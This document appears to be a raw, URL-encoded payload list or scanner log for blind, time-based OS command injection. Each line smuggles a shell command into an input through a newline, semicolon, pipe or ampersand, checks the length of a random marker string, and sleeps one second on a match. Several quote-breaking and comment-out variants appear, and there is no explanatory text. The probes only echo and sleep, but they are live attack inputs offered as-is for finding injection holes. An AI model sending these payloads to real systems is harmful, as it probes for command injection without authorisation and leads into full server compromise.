+%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%0A%20str%3D%24%28echo%20GOUIRV%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20 +%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%3B%20str%3D%24%28echo%20TNPFBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27 +%7C%20%5B%201%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%7C%20%5B%202%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%7C%20%5B%203%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%7C%20%5B%204%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%7C%20%5B%205%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%7C%20%5B%206%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%7C%20%5B%207%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%7C%20%5B%208%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%7C%20%5B%209%20-ne%20%24%28echo%20ZDEVVW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FWEHDM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27 +%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%0A%20str%3D%24%28echo%20DPBAVN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27 +%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%3B%20str%3D%24%28echo%20POEKQX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 +%7C%20%5B%201%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%7C%20%5B%202%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%7C%20%5B%203%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%7C%20%5B%204%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%7C%20%5B%205%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%7C%20%5B%206%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%7C%20%5B%207%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%7C%20%5B%208%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%7C%20%5B%209%20-ne%20%24%28echo%20MRDZPJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VGAFPT%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22 +%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%0A%20str%3D%24%28echo%20ZSOAWG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22 +%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%3B%20str%3D%24%28echo%20GUASVW%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23 +%7C%20%5B%201%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%7C%20%5B%202%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%7C%20%5B%203%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%7C%20%5B%204%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%7C%20%5B%205%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%7C%20%5B%206%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%7C%20%5B%207%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%7C%20%5B%208%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%7C%20%5B%209%20-ne%20%24%28echo%20FPMDOL%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LBFVNS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23 +%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%0A%20str%3D%24%28echo%20GSKKXZ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23 +%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%3B%20str%3D%24%28echo%20EWYGBO%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20// +%7C%20%5B%201%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%7C%20%5B%202%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%7C%20%5B%203%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%7C%20%5B%204%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%7C%20%5B%205%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%7C%20%5B%206%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// +%7C%20%5B%207%20-ne%20%24%28echo%20JNNROP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20// 